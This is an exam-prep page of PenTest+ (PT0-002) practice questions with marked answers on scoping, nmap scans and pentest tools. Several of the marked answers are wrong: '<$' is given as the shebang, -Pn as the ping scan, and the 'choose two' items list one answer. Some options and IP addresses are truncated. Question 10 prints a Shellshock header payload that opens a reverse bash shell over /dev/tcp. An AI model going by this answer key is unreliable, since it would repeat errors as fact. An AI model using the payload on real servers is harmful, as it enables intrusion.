2024 Updated CompTIA PT0-002 Exam Questions & Practice Tests, CompTIA PenTest+ Certification | SPOTO

Prepare to ace your CompTIA PenTest+ (PT0-002) certification with our comprehensive study resources. The best way to ensure success on the exam is by practicing with the latest exam questions. Our study materials cover a wide range of topics and scenarios, including hands-on penetration testing and vulnerability management tasks. With access to practice tests, sample questions, exam dumps, and exam questions and answers, you'll build the knowledge and skills needed to excel. Our mock exams and exam simulator provide a realistic exam experience to further enhance your preparation. Utilize our exam materials and exam answers to reinforce your understanding and readiness for the PT0-002 exam. With our study resources, you'll be well-prepared to demonstrate your cybersecurity expertise and achieve success in earning your CompTIA PenTest+ certification.

Question #1
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
Correct Answer: C
Question #2
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
A. NIST SP 800-53
B. OWASP Top 10
C. MITRE ATT&CK framework
D. PTES technical guidelines
Correct Answer: C
Question #3
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
A. Wait for the next login and perform a downgrade attack on the server
B. Capture traffic using Wireshark
C. Perform a brute-force attack over the server
D. Use an FTP exploit against the server
Correct Answer: B
Question #4
Which of the following tools provides Python classes for interacting with network protocols?
A. Responder
B. Impacket
C. Empire
D. PowerSploit
Correct Answer: B
Question #5
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
A. nmap -vv -sUV -p 53, 123-159 10
B. nmap -vv -sUV -p 53,123,161-162 10
C. nmap -vv -sUV -p 53,137-139,161-162 10
D. nmap -vv -sUV -p 53, 122-123, 160-161 10
Correct Answer: B
Question #6
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
A. Wireshark
B. Nessus
C. Retina
D. Burp Suite
E. Shodan
F. Nikto
Correct Answer: A
Question #7
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
Correct Answer: C
Question #8
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
A. A firewall or IPS blocked the scan
B. The penetration tester used unsupported flags
C. The edge network device was disconnected
D. The scan returned ICMP echo replies
Correct Answer: D
Question #9
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)
A. IP addresses and subdomains
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results
Correct Answer: A
Question #10
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10
Correct Answer: D
Question #11
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. <#
B. <$
C. ##
D. #$
E. #!
Correct Answer: B
